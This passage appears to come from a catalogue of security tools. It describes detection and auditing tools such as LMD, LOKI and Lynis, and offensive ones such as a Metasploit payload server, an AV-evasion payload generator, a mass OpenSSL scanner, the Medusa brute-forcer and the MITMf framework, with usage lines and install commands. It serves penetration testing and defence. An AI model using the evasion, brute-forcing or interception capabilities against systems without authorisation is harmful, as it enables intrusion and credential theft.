feature and from malware community resources. The
signatures that LMD uses are MD5 file hashes and HEX pattern
matches, they are also easily exported to any number of
detection tools such as ClamAV.
The driving force behind LMD is that there is currently limited
availability of open source/restriction free tools for Linux
systems that focus on malware detection and more important
that get it right. Many of the AV products that perform malware

detection on Linux have a very poor track record of detecting
threats, especially those targeted at shared hosted
environments.
The threat landscape in shared hosted environments is unique
from that of the standard AV products detection suite in that
they are detecting primarily OS level trojans, rootkits and
traditional file-infecting viruses but missing the ever increasing
variety of malware on the user account level which serves as
an attack platform.
The commercial products available for malware detection and
remediation in multi-user shared environments remains
abysmal. An analysis of 8,883 malware hashes, detected by
LMD 1.5, against 30 commercial anti-virus and malware
products paints a picture of how poorly commercial solutions
perform.
DETECTED KNOWN MALWARE: 1951
% AV DETECT (AVG): 58
% AV DETECT (LOW): 10
% AV DETECT (HIGH): 100
UNKNOWN MALWARE: 6931
Using the Team Cymru malware hash registry, we can see that
of the 8,883 malware hashes shipping with LMD 1.5, there was
6,931 or 78% of threats that went undetected by 30 commercial
anti-virus and malware products. The 1,951 threats that were
detected had an average detection rate of 58% with a low and
high detection rate of 10% and 100% respectively. There could
not be a clearer statement to the need for an open and
community driven malware remediation project that focuses on
the threat landscape of multi-user shared environments.
Features:
MD5 file hash detection for quick threat identification

HEX based pattern matching for identifying threat variants
statistical analysis component for detection of obfuscated
threats (e.g: base64)
integrated detection of ClamAV to use as scanner engine
for improved performance
integrated signature update feature with -u|update
integrated version update feature with -d|update-ver
scan-recent option to scan only files that have been
added/changed in X days
scan-all option for full path based scanning
checkout option to upload suspected malware to rfxn.com
for review / hashing
full reporting system to view current and previous scan
results
quarantine queue that stores threats in a safe fashion with
no permissions
quarantine batching option to quarantine the results of a
current or past scans
quarantine restore option to restore files to original path,
owner and perms
quarantine suspend account option to Cpanel suspend or
shell revoke users
cleaner rules to attempt removal of malware injected
strings
cleaner batching option to attempt cleaning of previous
scan reports
cleaner rules to remove base64 and gzinflate(base64
injected malware
daily cron based scanning of all changes in last 24h in
user homedirs
daily cron script compatible with stock RH style systems,
Cpanel & Ensim
kernel based inotify real time file scanning of created/
modified/moved files
kernel inotify monitor that can take path data from STDIN
or FILE
kernel inotify monitor convenience feature to monitor
system users
kernel inotify monitor can be restricted to a configurable
user html root
kernel inotify monitor with dynamic sysctl limits for optimal
performance
kernel inotify alerting through daily and/or optional weekly
reports
e-mail alert reporting after every scan execution (manual
& daily)
path, extension and signature based ignore options
background scanner option for unattended scan
operations
verbose logging & output of all actions
Source Data:
The defining difference with LMD is that it doesnt just detect

malware based on signatures/hashes that someone else
generated but rather it is an encompassing project that actively
tracks in the wild threats and generates signatures based on
those real world threats that are currently circulating.
There are four main sources for malware data that is used to
generate LMD signatures:
Network Edge IPS: Through networks managed as part of my
day-to-day job, primarily web hosting related, our web servers
receive a large amount of daily abuse events, all of which is
logged by our network edge IPS. The IPS events are
processed to extract malware urls, decode POST payload and
base64/gzip encoded abuse data and ultimately that malware is
retrieved, reviewed, classified and then signatures generated
as appropriate. The vast majority of LMD signatures have been
derived from IPS extracted data.
Community Data: Data is aggregated from multiple
community malware websites such as clean-mx and

malwaredomainlist then processed to retrieve new malware,
review, classify and then generate signatures.
ClamAV: The HEX & MD5 detection signatures from ClamAV
are monitored for relevant updates that apply to the target user
group of LMD and added to the project as appropriate. To date
there has been roughly 400 signatures ported from ClamAV
while the LMD project has contributed back to ClamAV by
submitting over 1,100 signatures and continues to do so on an
ongoing basis.
User Submission: LMD has a checkout feature that allows
users to submit suspected malware for review, this has grown
into a very popular feature and generates on average about
30-50 submissions per week.
Signature Updates:
The LMD signature are updated typically once per day or more
frequently depending on incoming threat data from the LMD
checkout feature, IPS malware extraction and other sources.
The updating of signatures in LMD installations is performed
daily through the default cron.daily script with the update
option, which can be run manually at any time.
An RSS feed is available for tracking malware threat updates:
http://www.rfxn.com/api/lmd
Detected Threats:
LMD 1.5 has a total of 10,822 (8,908 MD5 / 1,914) signatures,

before any updates. The top 60 threats by prevalence detected
by LMD are as follows:
base64.inject.unclassed
perl.ircbot.xscan
bin.dccserv.irsexxy
perl.mailer.yellsoft
bin.fakeproc.Xnuxer
perl.shell.cbLorD
bin.ircbot.nbot
perl.shell.cgitelnet
bin.ircbot.php3
php.cmdshell.c100
bin.ircbot.unclassed
php.cmdshell.c99
bin.pktflood.ABC123
php.cmdshell.cih
bin.pktflood.osf
php.cmdshell.egyspider
bin.trojan.linuxsmalli
php.cmdshell.fx29
c.ircbot.tsunami
php.cmdshell.ItsmYarD
exp.linux.rstb
php.cmdshell.Ketemu
exp.linux.unclassed
php.cmdshell.N3tshell
exp.setuid0.unclassed
php.cmdshell.r57
gzbase64.inject
php.cmdshell.unclassed
html.phishing.auc61
php.defash.buno
html.phishing.hsbc
php.exe.globals
perl.connback.DataCha0s
php.include.remote
perl.connback.N2
php.ircbot.InsideTeam
perl.cpanel.cpwrap
php.ircbot.lolwut
perl.ircbot.atrixteam
php.ircbot.sniper
perl.ircbot.bRuNo
php.ircbot.vj_denie
perl.ircbot.Clx
php.mailer.10hack
perl.ircbot.devil
php.mailer.bombam
perl.ircbot.fx29
php.mailer.PostMan
perl.ircbot.magnum
php.phishing.AliKay
perl.ircbot.oldwolf
php.phishing.mrbrain
perl.ircbot.putr4XtReme
php.phishing.ReZulT
perl.ircbot.rafflesia
php.pktflood.oey
perl.ircbot.UberCracker
php.shell.rc99
perl.ircbot.xdh
php.shell.shellcomm
Real-Time Monitoring:
The inotify monitoring feature is designed to monitor paths/

users in real-time for file creation/modify/move operations. This
option requires a kernel that supports inotify_watch
(CONFIG_INOTIFY) which is found in kernels 2.6.13+ and
CentOS/RHEL 5 by default. If you are running CentOS 4 you

should consider an inbox upgrade with:
http://www.rfxn.com/upgrade-centos-4-8-to-5-3/
There are three modes that the monitor can be executed with
and they relate to what will be monitored, they are USERS|
PATHS|FILES.
e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton
The options break down as follows:

USERS: The users option will take the homedirs of all system
users that are above inotify_minuid and monitor them. If
inotify_webdir is set then the users webdir, if it exists, will only
be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor
Once you start maldet in monitor mode, it will preprocess the
paths based on the option specified followed by starting the
inotify process. The starting of the inotify process can be a time
consuming task as it needs to setup a monitor hook for every
file under the monitored paths. Although the startup process
can impact the load temporarily, once the process has started it
maintains all of its resources inside kernel memory and has a
very small userspace footprint in memory or cpu usage.
Download LMD
LOKI - SCANNER FOR SIMPLE INDICATORS OF
COMPROMISE
Simple IOC Scanner

Detection is based on four detection methods:
1. File Name IOC
Regex match on full file path/name
2. Yara Rule Check

Yara signature match on file data and process memory
3. Hash check
Compares known malicious hashes (MD5, SHA1, SHA256)
with scanned files
The Windows binary is compiled with PyInstaller 2.1 and should

run as x86 application on both x86 and x64 based systems.
Run
Download the program archive via the button "Download

ZIP" on the right sidebar
Unpack LOKI locally
Provide the folder to a target system that should be
scanned: removable media, network share, folder on
target system
Right-click on loki.exe and select "Run as Administrator"
or open a command line "cmd.exe" as Administrator and
run it from there (you can also run LOKI without
administrative privileges but some checks will be disabled
and relevant objects on disk will not be accessible)
Reports
The resulting report will show a GREEN, YELLOW or RED

result line.
Please analyse the findings yourself by:
1. uploading non-confidential samples to Virustotal.com
2. Search the web for the filename
3. Search the web for keywords from the rule name
(e.g. EQUATIONGroupMalware_1 > search for
"Equation Group")
4. Search the web for the MD5 hash of the sample
Please report back false positives via the "Issues" section,
which is accessible via the right sidebar (mention the false
positive indicator like a hash and/or filename and the rule

name that triggered)
Usage
usage: loki.exe [-h] [-p path] [-s kilobyte] [--printAll]
[--noprocscan]
[--nofilescan] [--noindicator] [--debug]
Loki - Simple IOC Scanner
optional arguments:
-h, --help
-p path
Path to scan
-s kilobyte
Maximum file site to check in KB
(default 2000 KB)

--printAll
Print all files that are scanned
--noprocscan
Skip the process scan
--nofilescan
Skip the file scan
--noindicator
Do not show a progress indicator
--debug
Debug output
Download Loki
LUKS-OPS - AUTOMATE THE USAGE OF LUKS VOLUMES
IN LINUX
A bash script to automate the most basic usage of LUKS

volumes in Linux. Like:
Creating a virtual disk volume with LUKS format.
Mounting an existing LUKS volume
Unmounting a Single LUKS volume or all LUKS volume in
the system.
Basic Usage
There is an option for a menu:

./luks-ops.sh menu or simply ./luks-ops.sh
Other options include:

./luks-ops.sh new disk_Name Size_in_numbers
./luks-ops.sh mount /path/to/device (mountpoint)
./luks-ops.sh unmount-all
./luks-ops.sh clean
./luks-ops.sh usage
Default Options:
Virtual-disk size = 512 MB and it's created on /usr/

directory
Default filesystem used = ext4
Cipher options:
Creating LUKS1: aes-xts-plain64, Key: 256 bits,
LUKS header hashing: sha1, RNG: /dev/urandom
plain: aes-cbc-essiv:sha256, Key: 256 bits, Password
hashing: ripemd160 (about-time :D)
Mounting point = /media/luks_* where * is random-string.
Others.. NB. You can change /dev/urandom to /dev/zero
(speed?)
Dependencies (Install applications:)
1. dmsetup --- low level logical volume management

2. cryptsetup --- manage plain dm-crypt and LUKS
encrypted volumes
DownloadLUKS-OPs
LYNIS 2.0.0 - SECURITY AUDITING TOOL FOR UNIX/LINUX
SYSTEMS
Lynis is an open source security auditing tool. Primary goal is

to help users with auditing and hardening of Unix and Linux
based systems. The software is very flexible and runs on
almost every Unix based system (including Mac). Even the
installation of the software itself is optional!

How it works
Lynis will perform hundreds of individual tests to determine the

security state of the system. Many of these tests are also part
of common security guidelines and standards. Examples
include searching for installed software and determine possible
configuration flaws. Lynis goes further and does also test
individual software components, checks related configuration
files and measures performance. After these tests, a scan
report will be displayed with all discovered findings.
Typical use cases for Lynis:
Security auditing
Vulnerability scanning
System hardening
Requirements:
Privileged or non-privileged
DownloadLynis 2.0.0
SYSTEMS
Lynis is an open source security auditing tool. Commonly used

by system administrators, security professionals and auditors,
to evaluate the security defenses of their Linux/Unix based
systems. It runs on the host itself, so it can perform very
extensive security scans.

Supported operating systems
The tool has almost no dependencies, therefore it runs on

almost all Unix based systems and versions, including:
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several
storage devices!
No installation required
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
1. Determine operating system
2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins

5. Run security tests per category
6. Report status of security scan
During the scan, technical details about the scan are stored in a
log file. At the same time findings (warnings, suggestions, data
collection), are stored in a report file.
Opportunistic scanning
Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform
an initial round of Apache related tests. When during the
Apache scan it also discovers a SSL/TLS configuration, it will
perform additional auditing steps on that. While doing that, it
then will collect discovered certificates, so they can be scanned
later as well.
In-depth security scans
By performing opportunistic scanning, the tool can run with
almost no dependencies. The more it finds, the deeper the
audit will be. In other words, Lynis will always perform scans
which are customized to your system. No audit will be the
same!
Use cases
Since Lynis is flexible, it is used for several different purposes.

Typical use cases for Lynis include:
Security auditing
Compliance testing (e.g. PCI, HIPAA, SOx)
Vulnerability detection and scanning
System hardening
Resources used for testing
Many other tools use the same data files for performing tests.
Since Lynis is not limited to a few common Linux distributions, it

uses tests from standards and many custom ones not found in
any other tool.
Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian
Gentoo, Red Hat)
Lynis Plugins
Plugins enable the tool to perform additional tests. They can be

seen as an extension (or add-on) to Lynis, enhancing its
functionality. One example is the compliance checking plugin,
which performs specific tests only applicable to some standard.
Comparison with other tools
Lynis has a different way of doing things, so you have more

flexibility. After all, you should be the one deciding what
security controls make sense for your environment. We have a
small comparison with some other well known tools:
Bastille Linux
Bastille was for a long time the best known utility for hardening
Linux systems. It focuses mainly on automatically hardening
the system.
Differences with Bastille
Automated hardening tools are helpful, but at the same time
might give a false sense of security. Instead of just turning on
some settings, Lynis perform an in-depth security scan. You
are the one to decide what level of security is appropriate for
your environment. After all, not all systems have to be like Fort
Knox, unless you want it to be.

Benefits of Lynis
Supports more operating systems
Won't break your system
More in-depth audit
OpenVAS / Nessus
These products focus primarily on vulnerability scanning. They
do this via the network by polling services. Optionally they will
log in to a system and gather data.
Differences with OpenVAS / Nessus
Lynis runs on the host itself, therefore it can perform a deeper
analysis compared with network based scans. Additionally,
there is no risk for your business processes, and log files
remain clean from connection attempts and incorrect requests.
Although Lynis is an auditing tool, it will actually discover
vulnerabilities as well. It does so by using existing tools and
analyzing configuration files.
Lynis and OpenVAS are both open source and free to use.
Nessus is a closed source and paid.
Benefits of Lynis
Much faster
No pollution of log files, no disruption to business services
Host based scans provides more in-depth audit
Changelog
Lynis 2.1.0
= Lynis 2.1.0 (2015-04-16) =
General:
--------Screen output has been improved to provide additional

information.
OS support:
-----------CUPS detection on Mac OS has been improved. AIX systems
will now use csum
utility to create host ID. Group check have been altered
on AIX, to include
the -n ALL. Core dump check on Linux is extended to check
for actual values
as well.
Software:
---------McAfee detection has been extended by detecting a running
cma binary.
Improved detection of pf firewall on BSD and Mac OS.
Security patch checking
with zypper extended.
Session timeout:
----------------Tests to determine shell time out setting have been
extended to account for
AIX, HP-UX and other platforms. It will now determine
also if variable is
exported as a readonly variable. Related compliance
section PCI DSS 8.1.8
has been extended.

Documentation:
--------------- New document: Getting started with Lynis
https://cisofy.com/documentation/lynis/get-started/
Plugins (Enterprise):
---------------------- Update to file integrity plugin
Changes to PLGN-2606 (capabilities check)
- New configuration plugins:
PLGN-4802 (SSH settings)
PLGN-4804 (login.defs)
Download Lynis 2.1.0

SYSTEMS
Lynis is an open source security auditing tool. Commonly used

by system administrators, security professionals and auditors,
to evaluate the security defenses of their Linux/Unix based
systems. It runs on the host itself, so it can perform very
extensive security scans.
Supported operating systems
The tool has almost no dependencies, therefore it runs on

almost all Unix based systems and versions, including:
AIX
FreeBSD
HP-UX
Linux
Mac OS
NetBSD
OpenBSD
Solaris
and others
It even runs on systems like the Raspberry Pi and several
storage devices!
No installation required
The tool is very flexible and easy to use. It is one of the few
tools, in which installation is optional. Just place it on the
system, give it a command like "audit system", and it will run. It
is written in shell script and released as open source software
(GPL).
How it works
Lynis performs hundreds of individual tests, to determine the
security state of the system. The security scan itself consists of
performing a set of steps, from initialization the program, up to
the report.
Steps
1. Determine operating system

2. Search for available tools and utilities
3. Check for Lynis update
4. Run tests from enabled plugins
5. Run security tests per category
6. Report status of security scan
During the scan, technical details about the scan are stored in a
log file. At the same time findings (warnings, suggestions, data
collection), are stored in a report file.

Opportunistic scanning
Lynis scanning is opportunistic: it uses what it can find.

For example if it sees you are running Apache, it will perform
an initial round of Apache related tests. When during the
Apache scan it also discovers a SSL/TLS configuration, it will
perform additional auditing steps on that. While doing that, it
then will collect discovered certificates, so they can be scanned
later as well.
In-depth security scans
By performing opportunistic scanning, the tool can run with
almost no dependencies. The more it finds, the deeper the
audit will be. In other words, Lynis will always perform scans
which are customized to your system. No audit will be the
same!
Use cases
Since Lynis is flexible, it is used for several different purposes.

Typical use cases for Lynis include:
Security auditing
Compliance testing (e.g. PCI, HIPAA, SOx)
Vulnerability detection and scanning
System hardening
Resources used for testing
Many other tools use the same data files for performing tests.
Since Lynis is not limited to a few common Linux distributions, it
uses tests from standards and many custom ones not found in
any other tool.
Best practices
CIS
NIST
NSA
OpenSCAP data
Vendor guides and recommendations (e.g. Debian
Gentoo, Red Hat)
Parameters
--auditor "Given name Surname"
Assign an auditor name
to the audit (report)

--checkall
-c
Start the check
--check-update
--cronjob
--help
Check if Lynis is up-to-date

Run Lynis as cronjob (includes -c -Q)
-h
Shows valid parameters
--manpage
View man page
--nocolors
Do not use any colors
--pentest
Perform a penetration test scan (non-
privileged)
--quick
-Q
Don't wait for user input, except on errors
--quiet
Only show warnings (includes --quick, but
doesn't wait)
--reverse-colors
Use a different color scheme for
lighter backgrounds
--version
-V
Check program version (and quit)
Changelog
Lynis 2.1.1
=
Lynis 2.1.1 (2015-07-22)
This release adds a lot of improvements, with focus

on performance, and
additional support for common Linux distributions and
external utilities.
We recommend to use this latest version.

* Operating system enhancements
------------------------------Support for systems like CentOS, openSUSE, Slackware
is improved.
* Performance
------------Performance tuning has been applied, to speed up
execution of the audit on
systems with many files. This also includes code
cleanups.
* Automatic updates
------------------Initial work on an automatic updater has been
implemented. This way Lynis
can be scheduled for automatic updating from a
trusted source.
* Internal functions
-------------------Not all systems have readlink, or the -f option of
readlink. The
ShowSymlinkPath function has been extended with a
Python based check, which
is often available.
* Software support
-----------------Apache module directory /usr/lib64/apache has been

added, which is used on
openSUSE.
Support for Chef has been added.
Added tests for CSF's lfd utility for integrity
monitoring on directories and
files. Related tests are FINT-4334 and FINT-4336.
Added support for Chrony time daemon and timesync
daemon. Additionally NTP
sychronization status is checked when it is enabled.
Improved single user mode protection on the
rescue.service file.
* Other
------Check for user permissions has been extended.
Python binary is now detected, to help with symlink
detection.
Several new legal terms have been added, which are
used for usage in banners.
In several files old tests have been removed, to
further clean up the code.
* Bug fixes
---------
Nginx test showed error when access_log had multiple

parameters.
Tests using locate won't be performed if not present.
Fix false positive match on Squid unsafe ports
[SQD-3624].
The hardening index is now also inserted into the
report if it is not displayed
on screen.
* Functions
--------Added AddSystemGroup function
* New tests
--------Several new tests have been added:
[PKGS-7366] Scan for debsecan utility on Debian
systems
[PKGS-7410] Determine amount of installed kernel
packages
[TIME-3106] Check synchronization status of NTP on
systemd based systems
[CONT-8102] Docker daemon status and gather basic
details
[CONT-8104] Check docker info for any Docker warnings
[CONT-8106] Check total, running and unused Docker
containers
* Plugins
--------[PLGN-2602] Disabled by default, as it may be too

slow for some machines
[PLGN-3002] Extended with /sbin/nologin
* Documentation
--------------A new document has been created to help with the
process of upgrading Lynis.
It is available at https://cisofy.com/documentation/
lynis/upgrading/
-------------------------------------------------------------
Download Lynis 2.1.1

MALHEUR - AUTOMATIC ANALYSIS OF MALWARE
BEHAVIOR
A novel tool for malware analysis
Malheur is a tool for the automatic analysis of malware

behavior (program behavior recorded from malicious software
in a sandbox environment). It has been designed to support the
regular analysis of malicious software and the development of
detection and defense measures. Malheur allows for identifying
novel classes of malware with similar behavior and assigning
unknown malware to discovered classes.
Analysis of malware behavior?
Malheur builds on the concept of dynamic analysis: Malware

binaries are collected in the wild and executed in a sandbox,
where their behavior is monitored during run-time. The
execution of each malware binary results in a report of
recorded behavior. Malheur analyzes these reports for
discovery and discrimination of malware classes using machine
learning.
Malheur can be applied to recorded behavior of various format,
as long as monitored events are separated by delimiter
symbols, for example as in reports generated by the popular
malware sandboxes CWSandbox, Anubis, Norman Sandbox
and Joebox.
Malheur allows for identifying novel classes of malware with

similar behavior and assigning unknown malware to discovered
classes. It supports four basic actions for analysis which can be
applied to reports of recorded behavior:
1. Extraction of prototypes: From a given set of reports,
malheur identifies a subset of prototypes representative
for the full data set. The prototypes provide a quick
overview of recorded behavior and can be used to guide
manual inspection.
2. Clustering of behavior Malheur automatically identifies
groups (clusters) of reports containing similar behavior.
Clustering allows for discovering novel classes of malware
and provides the basis for crafting specific detection and
defense mechanisms, such as anti-virus signatures.
3. Classification of behavior: Based on a set of previously
clustered reports, malheur is able to assign unknown
behavior to known groups of malware. Classification
enables identifying novel and unknown variants of
malware and can be used to filter program behavior prior
to manual inspection.
4. Incremental analysis: Malheur can be applied
incrementally for analysis of large data sets. By
processing reports in chunks, the run-time as well as
memory requirements can be significantly reduced. This
renders long-term application of malheur feasible, for
example for daily analysis of incoming malware programs.
Dependencies
libconfig >= 1.4, http://www.hyperrealm.com/libconfig/

libarchive >= 2.70, http://libarchive.github.com/
Debian & Ubuntu Linux

The following packages need to be installed for compiling
Malheur on Debian and Ubuntu Linux
gcc
libconfig9-dev
libarchive-dev
For bootstrapping Malheur from the GIT repository or

manipulating the automake/autoconf configuration, the
following additional packages are necessary.
automake
autoconf
libtool
Mac OS X
For compiling Malheur on Mac OS X a working installation of
Xcode is required including gcc. Additionally, the following
packages need to be installed via Homebrew
libconfig
libarchive (from homebrew-alt)
OpenBSD
For compiling Malheur on OpenBSD the following packages are
required. Note that you need to use gmake instead of make for
building Malheur.
gmake
libconfig
libarchive
For bootstrapping Malheur from the GIT repository, the

following packages need be additionally installed
autoconf
automake
libtool
Compilation & Installation
From GIT repository first run

$ ./bootstrap
From tarball run

$ ./configure [options]
$ make
$ make check
$ make install
Options for configure

--prefix=PATH
Set directory prefix for
installation
By default Malheur is installed into /usr/local. If you prefer a

different location, use this option to select an installation
directory.
DownloadMALHEUR
MALIGNO V2.0 - METASPLOIT PAYLOAD SERVER
Maligno is an open source penetration testing tool written in

Python that serves Metasploit payloads. It generates shellcode
with msfvenom and transmits it over HTTP or HTTPS. The

shellcode is encrypted with AES and encoded prior to
transmission.
Maligno also comes with a client tool, which supports HTTP,
HTTPS and encryption capabilities. The client is able to
connect to Maligno in order to download an encrypted
Metasploit payload. Once the shellcode is received, the client
will decode it, decrypt it and inject it in the target machine.
The client-server communications can be configured in a way
that allows you to simulate specific C&C communications or
targeted attacks. In other words, the tool can be used as part of
adversary replication engagements.
Are you new to Maligno? CheckMaligno Video Series with
examples and tutorials.
An error occurred.
Changelog: Adversary replication functionality improvements.

POST and HEAD method support added, new client profile
added, server multithreading support added, perpetual shell
mode added, client static HTTP(S) proxy support added,
documentation and stability improvements.
Important: Configuration files or profiles made for Maligno v1.x
are not compatible with Maligno v2.0.
DownloadMaligno v2.0
MALWARE - MALWARE REPOSITORY FRAMEWORK
malwaRE is a malware repository website created using PHP

Laravel framework, used to manage your own malware zoo.
malwaRE was based on the work ofAdlice team with some
extra features.
If you guys have any improvements, please let me know or
send me a pull request.
Features
Self-hosted solution (PHP/Mysql server needed)

VirusTotal results (option for uploading unknown samples)
Search filters available (vendor, filename, hash, tag)
Vendor name is picked from VirusTotal results in that
order: Microsoft, Kaspersky, Bitdefender
Add writeup url(s) for each sample
Manage samples by tag
Tag autocomplete
VirusTotal rescan button (VirusTotal's score column)
Download samples from repository
DownloadMalwaRE
MASSBLEED - MASS SSL VULNERABILITY SCANNER
USAGE
sh massbleed.sh [CIDR|IP] [single|port|subnet] [port]

[proxy]
ABOUT
This script has four main functions with the ability to proxy all
connections:
1. To mass scan any CIDR range for OpenSSL
vulnerabilities via port 443/tcp (https) (example: sh
massbleed.sh 192.168.0.0/16)
2. To scan any CIDR range for OpenSSL vulnerabilities via
any custom port specified (example: sh massbleed.sh
192.168.0.0/16 port 8443)
3. To individual scan every port (1-10000) on a single system
for vulnerable versions of OpenSSL (example: sh
massbleed.sh 127.0.0.1 single)
4. To scan every open port on every host in a single class C
subnet for OpenSSL vulnerabilities (example: sh
massbleed.sh 192.168.0. subnet)
PROXY: A proxy option has been added to scan via
proxychains. You'll need to configure /etc/proxychains.conf for
this to work.
PROXY USAGE EXAMPLES: (example: sh massbleed.sh
192.168.0.0/16 0 0 proxy) (example: sh massbleed.sh
192.168.0.0/16 port 8443 proxy) (example: sh massbleed.sh
127.0.0.1 single 0 proxy) (example: sh massbleed.sh
192.168.0. subnet 0 proxy)
VULNERABILITIES:
1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
3. Poodle SSLv3 vulnerability (CVE-2014-3566)
DownloadMassBleed
MEDUSA - SPEEDY, PARALLEL AND MODULAR LOGIN

BRUTE-FORCER
Medusa is intended to be a speedy, massively parallel,

modular, login brute-forcer. The goal is to support as many
services which allow remote authentication as possible. The
author considers following items as some of the key features of
this application:
Thread-based parallel testing. Brute-force testing can be
performed against multiple hosts, users or passwords
concurrently.
Flexible user input. Target information (host/user/
password) can be specified in a variety of ways. For
example, each item can be either a single entry or a file
containing multiple entries. Additionally, a combination file
format allows the user to refine their target listing.
Modular design. Each service module exists as an
independent .mod file. This means that no modifications
are necessary to the core application in order to extend
the supported list of services for brute-forcing.
Why?
Why create Medusa? Isn't this the same thing as THC-Hydra?

Here are some of the reasons for this application:
Application stability. Maybe I'm just lame, but Hydra
frequently crashed on me. I was no longer confident that
Hydra was actually doing what it claimed to be. Rather
than fix Hydra, I decided to create my own buggy
application which could crash in new and exciting ways.
Code organization. A while back I added several features
to Hydra (parallel host scanning, SMBNT module). Retrofitting the parallel host code to Hydra was a serious pain.
This was mainly due to my coding ignorance, but was
probably also due to Hydra not being designed from the
ground-up to support this. Medusa was designed from the
start to support parallel testing of hosts, users and
passwords.
Speed. Hydra accomplishes its parallel testing by forking
off a new process for each host and instance of the
service being tested. When testing many hosts/users at
once this creates a large amount of overhead as user/
password lists must be duplicated for each forked

process. Medusa is pthread-based and does not
unnecessarily duplicate information.
Education. I am not an experienced C programmer, nor
do I consider myself an expert in multi-threaded
programming. Writing this application was a training
exercise for me. Hopefully, the results of it will be useful
for others.
Module specific details:
AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RDP
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware Authentication Daemon (vmauthd)
VNC
Generic Wrapper
Web Form
News
2015-06-07: Released Medusa v2.2_rc2

2015-05-28: Released Medusa v2.2_rc1
2012-05-25: Released Medusa v2.1.1
2012-04-02: Released Medusa v2.1
2011-03-04: tak and bigmoneyhat have released a Java-based
GUI for Medusa (Medusa-gui)
2010-02-09: Released Medusa v2.0
DownloadMedusa
METASPLOIT AV EVASION - METASPLOIT PAYLOAD
GENERATOR THAT AVOIDS MOST ANTI-VIRUS
PRODUCTS
Metasploit payload generator that avoids most Anti-Virus

products.
Installing
git clone https://github.com/nccgroup/
metasploitavevasion.git
chmod +x the avoid.sh file before use.

How To Use
./avoid.sh
Then follow the on screen prompts.

Features
Easily generate a Metasploit executable payload to

bypass Anti-Virus detection
Local or remote listener generation
Disguises the executable file with a PDF icon
Executable opens minimised on the victims computer
Automatically creates AutoRun files for CDROM
exploitation
DownloadMetasploit AV Evasion
MICENUM - MANDATORY INTEGRITY CONTROL
ENUMERATOR FOR WINDOWS
In the context of the Microsoft Windows family of operating

systems, Mandatory Integrity Control (MIC) is a core security
feature introduced in Windows Vista and implemented in
subsequent lines of Windows operating systems. It adds
Integrity Levels(IL)-based isolation to running processes and
objects. The IL represents the level of trustworthiness of an
object, and it may be set to files, folders, etc. Believe it or not,

there is no graphical interface for dealing with MIC in
Windows. MicEnum has been created to solve this, and as a
tool for forensics.
MicEnum is a simple graphical tool that:
Enumerates the Integrity Levels of the objects (files and
folders) in the hard disks.
Enumerates the Integrity Levels in the registry.
Helps to detect anomalies in them by spotting different
integrity levels.
Allows to store and restore this information in an XML file
so it may be used for forensic purposes.
Allows to set or modify the integrity levels graphically.
MicEnum scanning a folder

How does the tool work?
The only way by now, to show or set Integrity Levels in
Windows is by using icacls.exe, a command line tool. There is
no easy or standard way to detect changes or anomalies. As in
NTFS, an attacker may have changed Integrity Levels of a file
in a system to elevate privileges or leverage another attack,
so, watching this kind of movements and anomalies is
important for forensics or preventive actions.
The tool represents files and folders in a tree style. The integrity
level of files and folders is shown in a column next to them. By
scanning a folder, the tool will check all Integrity Levels and,
if any of them does not match with its parent, it will expand
it. If you have expanded some folders and want to group back
the ones that are known to be the same, just use the checkbox
at the bottom. It will hide the folders that are supposed to share
same integrity level.
MicEnum scanning a Windows registry branch

For setting new integrity levels, just use the contextual menu
again and set the desired level. Do not change them if you do
not know what you are doing. You may need administrator
privileges to achieve the change.
The program allows to set different integrity levels

For forensic purposes, the whole "session" or information about
the integrity levels may be saved as an XML file. Later you may
restore it with this same tool. Once restored, icons are missing,
and there is no chance to set new values, of course, since you
are not using your "live" hard disk.
If a session is loaded, the different values are shown

This all applies to registry branches as well, in its
correspondent tab.
MicEnum is inspired in AccessEnum, a classical tool by
Sysinternals that enumerates NTFS permissions and helps
detecting anomalies.
Download MicEnum
MITMF - FRAMEWORK FOR MAN-IN-THE-MIDDLE
ATTACKS
Framework for Man-In-The-Middle attacks

Available plugins
SMBtrap - Exploits the 'SMB Trap' vulnerability on
connected clients
Screenshotter - Uses HTML5 Canvas to render an
accurate screenshot of a clients browser
Responder - LLMNR, NBT-NS, WPAD and MDNS
poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP spoofing, ICMP
redirects or DHCP spoofing
BeEFAutorun - Autoruns BeEF modules based on a
client's OS or browser type
AppCachePoison - Perform app cache poisoning attacks
Ferret-NG - Transperently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser
plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables sent over HTTP using
the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with
out-of-date browser plugins
jskeylogger - Injects a Javascript keylogger into a client's
webpages
Replace - Replace arbitary content in HTML content
SMBAuth - Evoke SMB challenge-response authentication
attempts
Upsidedownternet - Flips images 180 degrees
How to install on Kali

apt-get install mitmf
Installation
If MITMf is not in your distro's repo or you just want the latest
version:
Run the command git clone https://github.com/
byt3bl33d3r/MITMf.git to clone this directory
Run the setup.sh script
Run the command pip install --upgrade -r
requirements.txt to install all Python dependencies
On Kali Linux, if you get an error while installing the pypcap
package or when starting MITMf you see: ImportError: no
module named pcap, run apt-get install python-pypcap to
fix it
DownloadMITMf
MOBAXTERM - TERMINAL FOR WINDOWS WITH X11
SERVER, TABBED SSH CLIENT, NETWORK TOOLS AND
MUCH MORE...
